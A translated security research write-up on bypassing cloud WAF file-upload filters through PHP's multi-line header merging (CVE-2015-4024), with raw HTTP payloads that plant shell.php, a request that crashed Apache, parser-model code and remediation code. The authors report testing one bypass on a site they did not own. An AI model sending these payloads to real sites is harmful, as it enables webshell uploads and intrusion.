0x00 Background
Today we start from the PHP remote DoS vulnerability disclosed on 2015.04.03 (CVE-2015-4024). For the technical details see the Chinese write-up at http://drops.wooyun.org/papers/6077 and the PHP bug report in English at https://bugs.php.net/bug.php?id=69364. In short: when PHP parses the headers of a multipart body part it concatenates continuation lines onto the previous header value, and the concatenation re-copies the whole accumulated value for every line, which leads to a DoS. The vulnerability has value beyond DoS, however; one use is to bypass the file upload defenses of the current cloud WAFs.
At present the popular cloud WAF vendors at home and abroad include Baidu Cloud Acceleration, 360 Website Guard, Jiasule and others. Using the PHP remote DoS vulnerability together with a property of the official PHP fix, we successfully bypassed the file upload defenses of the current mainstream WAFs, including Baidu Cloud Acceleration, 360 Website Guard, Knownsec Jiasule and Safedog.
Next, taking PHP as the example, we explain the bypass method in detail.
0x01 How the WAF is bypassed
From the principle of the PHP DoS: when the multipart_buffer_headers function parses a header into a value, that value may span n lines. Every line that starts with whitespace, or that does not contain the character ':', triggers the code block below, which merges the line into the previous value. Parsing a header whose value spans n lines therefore executes the merge block (n-1) times, and because each execution copies the entire value accumulated so far, the total work grows quadratically with n. That is the DoS.
#!c
prev_len = strlen(prev_entry.value);
cur_len = strlen(line);

entry.value = emalloc(prev_len + cur_len + 1);     /* 1 memory allocation */
memcpy(entry.value, prev_entry.value, prev_len);  /* 1 copy: the whole accumulated value */
memcpy(entry.value + prev_len, line, cur_len);    /* 1 copy: the new line */
entry.value[cur_len + prev_len] = '\0';

entry.key = estrdup(prev_entry.key);

zend_llist_remove_tail(header);                   /* 1 memory release */
The official PHP fix avoids the repeated copying during the merge and so removes the DoS, but it keeps the merge semantics. That is the key to bypassing the WAF: when multipart_buffer_headers parses a header, the value may still span several lines, and every line that starts with whitespace or contains no ':' is still merged into the previous value. The WAF does not take this protocol-compatibility behavior into account when it parses the uploaded file name; it performs no multi-line merge, and so it can be bypassed.
Based on this principle we construct a payload that bypasses the WAF's upload defense. The WAF resolves the file name to "test3.jpg", whereas PHP joins the continuation line onto the value and sees the file name as "test3.jpg" followed by "sf/shell.php". Because "/" is the directory separator, PHP keeps only the part after the last "/", so the uploaded file is saved as shell.php. The bypass payload, the test script and the result follow.
WAF bypass payload:
#!http
------WebKitFormBoundaryx7v4ahipwn8ig52y
Content-Disposition: form-data; name="file"; filename="test3.jpg
sf/shell.php"
Content-Type: application/octet-stream

------WebKitFormBoundaryx7v4ahipwn8ig52y
File upload test script:
#!php
Result: the payload uploads normally.
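To make the parser difference concrete, here is an added example in Python; it is not code from the article, from PHP or from any WAF vendor. It models the two parsers that disagree: PHP's multipart_buffer_headers continuation handling plus the filename and path-stripping logic of rfc1867.c, and the line-oriented, double-quote-only filename extraction that the article reports for the bypassed WAFs (the WAF model is an assumption about the observed behavior, not a vendor's code). It also counts the bytes copied while merging continuation lines before and after the official fix, to show the quadratic cost behind the DoS and that the merged value is the same either way. The header blocks are constructed (boundary line and file body omitted), and the single-quoted form of the payload that section 3.1 introduces is included as a third case.

```python
import re

# Model, written for this page, of PHP's multipart_buffer_headers() in
# main/rfc1867.c (the function behind CVE-2015-4024). It is not PHP's code.
# Input is the header block of one multipart part: the bytes after the
# boundary line, up to and including the blank line. Two behaviours matter:
#  * a line that starts with whitespace, or that contains no ':', is appended
#    verbatim (CRLF already stripped) to the previous header's value;
#  * vulnerable=True re-copies the whole accumulated value on every
#    continuation line (the quadratic copying behind the DoS);
#    vulnerable=False models the fixed, amortised append. The resulting
#    headers are identical either way, which is why the bypass survives the fix.
def php_parse_headers(part: bytes, vulnerable: bool = False):
    """Return (headers, bytes_copied); headers is a list of [key, value]."""
    headers, copied = [], 0
    for line in part.split(b"\n"):
        line = line[:-1] if line.endswith(b"\r") else line   # next_line() drops the CR
        if line == b"":
            break                                            # blank line ends the headers
        key = value = None
        if not line[:1].isspace():                           # leading space => same header
            colon = line.find(b":")
            if colon != -1:
                key, value = line[:colon], line[colon + 1:].lstrip()
        if value is not None:
            headers.append([key, value])
        elif headers:                                        # no ':' => continuation
            copied += (len(headers[-1][1]) if vulnerable else 0) + len(line)
            headers[-1][1] += line
        # a continuation line before any header is skipped, as in PHP
    return headers, copied


def php_filename(headers):
    """Model of how rfc1867.c turns Content-Disposition into $_FILES[..]['name']:
    the filename= value may be wrapped in double or single quotes
    (php_ap_getword_conf accepts both), and everything up to the last '/' or
    '\\' is stripped so only the base name is kept. Simplified: assumes no ';'
    inside the quoted value."""
    for key, value in headers:
        if key.strip().lower() != b"content-disposition":
            continue
        for param in value.split(b";"):
            name, eq, raw = param.strip().partition(b"=")
            if not eq or name.strip().lower() != b"filename":
                continue
            raw = raw.lstrip()
            if raw[:1] in (b'"', b"'"):
                end = raw.find(raw[:1], 1)
                fname = raw[1:] if end == -1 else raw[1:end]
            else:
                fname = raw.split()[0] if raw.split() else b""
            return fname[max(fname.rfind(b"/"), fname.rfind(b"\\")) + 1:]
    return None


def waf_filename(part: bytes):
    """Assumed model (not any vendor's code) of the extraction the article
    reports for the bypassed WAFs: each header is one CRLF-delimited line, the
    file name must be double-quoted, and the value ends at the closing quote
    or, if the line has none, at the end of the line."""
    for line in part.split(b"\r\n"):
        if line.lower().startswith(b"content-disposition:"):
            m = re.search(rb'filename="([^"]*)"?', line)
            return m.group(1) if m else None
    return None


# Constructed header blocks (boundary line and file body omitted).
PART_NORMAL = (b'Content-Disposition: form-data; name="file"; filename="test.php"\r\n'
               b'Content-Type: application/octet-stream\r\n\r\n')
PART_DQ = (b'Content-Disposition: form-data; name="file"; filename="test3.jpg\r\n'
           b'sf/shell.php"\r\n'
           b'Content-Type: application/octet-stream\r\n\r\n')
PART_SQ = (b"Content-Disposition: form-data; name=\"file\"; filename='test3.jpg\r\n"
           b"sf/shell.php'\r\n"
           b'Content-Type: application/octet-stream\r\n\r\n')


def compare(part: bytes):
    """(name the WAF model checks, name PHP actually saves the upload under)."""
    headers, _ = php_parse_headers(part)
    return waf_filename(part), php_filename(headers)


def dos_copy_cost(n_lines: int, line_len: int = 10):
    """Bytes copied while merging n_lines continuation lines of line_len bytes:
    (vulnerable merge, fixed merge). The merged header value is identical."""
    part = b"X-Filler: a\r\n" + (b"b" * line_len + b"\r\n") * n_lines + b"\r\n"
    vuln_headers, vuln = php_parse_headers(part, vulnerable=True)
    fixed_headers, fixed = php_parse_headers(part, vulnerable=False)
    assert vuln_headers == fixed_headers
    return vuln, fixed


if __name__ == "__main__":
    for label, part in ("normal", PART_NORMAL), ("double-quote", PART_DQ), ("single-quote", PART_SQ):
        print(label, compare(part))
    print("bytes copied for 1000 continuation lines (vulnerable, fixed):", dos_copy_cost(1000))
```

For the normal part both sides agree on test.php; for the double-quoted payload the WAF model checks test3.jpg while PHP stores shell.php; for the single-quoted payload the WAF model finds no double-quoted filename at all and PHP still stores shell.php. With 1000 ten-byte continuation lines the vulnerable merge copies about five million bytes against ten thousand for the fixed one, with the same parsed header in both cases.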
0x02 Bypassing WAFs in practice
The author set up a test site, placed it behind 360 Website Guard and Jiasule, and verified the bypass of their file upload defenses.
2.1 Bypassing 360 Website Guard
Step 1: verify that the site is protected by 360 Website Guard; a request that uploads a PHP file directly is intercepted.
Step 2: the bypass of 360 Website Guard succeeds and the shell is uploaded as apo.php. This request carries no Content-Type header, which does not affect the bypass.
2.2 Bypassing Knownsec Jiasule
Step 1: verify that the site is protected by Jiasule; a request that uploads a PHP file directly is intercepted.
Step 2:
The bypass of Jiasule succeeds and the shell is uploaded as syt.php.
2.3 Bypassing Baidu Cloud Acceleration
Baidu Cloud Acceleration is related to CloudFlare: the Baidu interception page visibly uses CloudFlare, so Baidu Cloud Acceleration is presumably a localized joint product of Baidu and CloudFlare. For the Baidu test no environment of our own was set up; we found a site already behind Baidu Cloud Acceleration to test against.
Step 1: verify that the site is protected by Baidu Cloud Acceleration; a request that uploads a PHP file directly is intercepted.
Step 2: the bypass of Baidu Cloud Acceleration succeeds.
2.4 Safedog test
We tested Safedog's file upload protection with this method:
#!http
Content-Disposition: form-data; name="file"; filename="2.php%0aaa:
Content-Type: image/jpeg
Between "2.php" and "aa" there is a %0a, that is, a literal line feed. The Apache process handling this request crashed outright. It feels like this could be overflowed; we did not dig deeper.
2.5 CloudFlare test
To test whether the international version of CloudFlare can be bypassed, we bought its service specifically. The result: even with the full rule set enabled, file uploads are not blocked at all.
2.6 Amazon WAF
Amazon's WAF ships with no rules; every rule has to be configured by the user. The configuration options include no file-upload option, so there is nothing to bypass. The gap between domestic and foreign WAFs is quite large; why they are designed so differently is worth pondering.
We also bypassed other WAFs that are not listed here.
0x03 Extensions: further work
3.1 Bypassing file name parsing with other characters
Similarly, we found that besides double quotes, single quotes also bypass the WAF defenses and achieve the upload: PHP's multipart parser accepts a filename value delimited by either double or single quotes, while the WAFs only recognize the double-quoted form.
#!http
------WebKitFormBoundaryx7v4ahipwn8ig52y
Content-Disposition: form-data; name="file"; filename='test3.jpg
sf/shell.php'
Content-Type: application/octet-stream

------WebKitFormBoundaryx7v4ahipwn8ig52y
3.2 Other application scripting languages
We also found that JSP parsing has peculiarities of its own that can be used to bypass the WAF. Other commonly used web languages such as ASP, ASPX and Python have not been tested yet.
0x04 Remediation
4.1 Remediation plan one
When parsing a file upload request, reject the request if it does not conform to the protocol specification, for example when a header value continues onto the next line. False positives may occur, and their impact needs to be assessed.
4.2 Remediation plan two
Parse file names the way PHP does: after merging continuation lines as PHP merges them, when the filename value begins with a single or double quotation mark, it ends at the matching single or double quotation mark.
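An added example of both remediation plans as a WAF-side check (example code, not from the article or from any WAF vendor); it runs on one part's header block, and the allowed-extension policy, the constructed parts and the function names are assumptions. With strict=True it implements plan one: any continuation line in the headers, which is the only way a line break can get into filename=, makes the part non-conforming and the request is rejected. With strict=False it implements plan two: continuation lines are folded exactly as PHP folds them, the filename value is read with either quote character, the path is stripped as PHP strips it, and the extension policy is applied to that name, so the WAF decides on the same name PHP will store.

```python
import re

ALLOWED_EXT = {b"jpg", b"jpeg", b"png", b"gif"}   # assumed upload policy for the demo

# The value forms PHP's php_ap_getword_conf accepts: "...", '...' or a bare token.
FILENAME_RE = re.compile(rb"""filename=\s*(?:"([^"]*)"|'([^']*)'|([^\s;]+))""", re.IGNORECASE)


def header_lines(part: bytes):
    """The header block of a multipart part (bytes after the boundary line), as lines."""
    return part.split(b"\r\n\r\n", 1)[0].split(b"\r\n")


def is_continuation(line: bytes) -> bool:
    """The condition under which rfc1867.c appends a line to the previous header value."""
    return line[:1].isspace() or b":" not in line


def fold_like_php(lines):
    """Plan two, step 1: merge continuation lines the way PHP does, so the WAF
    inspects the same Content-Disposition value that PHP will parse."""
    headers = []
    for line in lines:
        if not is_continuation(line):
            key, _, value = line.partition(b":")
            headers.append([key.strip().lower(), value.lstrip()])
        elif headers:
            headers[-1][1] += line
    return dict(headers)


def effective_filename(disposition: bytes):
    """Plan two, step 2: the name PHP will store, i.e. filename= read with
    either quote style and everything up to the last '/' or '\\' removed."""
    m = FILENAME_RE.search(disposition)
    if m is None:
        return None
    fname = next(g for g in m.groups() if g is not None)
    return fname[max(fname.rfind(b"/"), fname.rfind(b"\\")) + 1:]


def inspect_upload(part: bytes, strict: bool) -> str:
    """Return 'reject-nonconforming', 'block-extension' or 'allow'."""
    lines = header_lines(part)
    if strict and any(is_continuation(line) for line in lines):
        return "reject-nonconforming"             # plan one
    name = effective_filename(fold_like_php(lines).get(b"content-disposition", b""))
    if name is None:
        return "allow"                            # no file name: nothing is written to disk
    ext = name.rsplit(b".", 1)[1].lower() if b"." in name else b""
    return "allow" if ext in ALLOWED_EXT else "block-extension"


# Constructed parts: a normal image, the double-quote payload from 0x01 and
# the single-quote variant from 3.1 (boundary line and body omitted).
PART_IMAGE = (b'Content-Disposition: form-data; name="file"; filename="photo.JPG"\r\n'
              b'Content-Type: image/jpeg\r\n\r\n')
PART_DQ = (b'Content-Disposition: form-data; name="file"; filename="test3.jpg\r\n'
           b'sf/shell.php"\r\n'
           b'Content-Type: application/octet-stream\r\n\r\n')
PART_SQ = (b"Content-Disposition: form-data; name=\"file\"; filename='test3.jpg\r\n"
           b"sf/shell.php'\r\n"
           b'Content-Type: application/octet-stream\r\n\r\n')

if __name__ == "__main__":
    for label, part in ("image", PART_IMAGE), ("double-quote", PART_DQ), ("single-quote", PART_SQ):
        print(label, "strict:", inspect_upload(part, strict=True),
              "php-compatible:", inspect_upload(part, strict=False))
```

Plan one is the simpler rule and needs no knowledge of the back end, at the cost of rejecting any client that folds header lines; plan two lets such requests through but requires the WAF to track the back end's parsing rules, including the quote handling and the path stripping, for every runtime it protects.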
0x05 Summary
This article reviewed the PHP remote DoS vulnerability (CVE-2015-4024) and used the parsing behavior behind it to bypass the file upload defenses of existing WAFs and upload a shell. Its greater value is a new way of thinking about WAF bypasses: exploit the differences in behavior between the back-end application runtime and the WAF. In general, a good WAF must be able to handle the differences between the web application containers, the standard protocols and the web servers it fronts.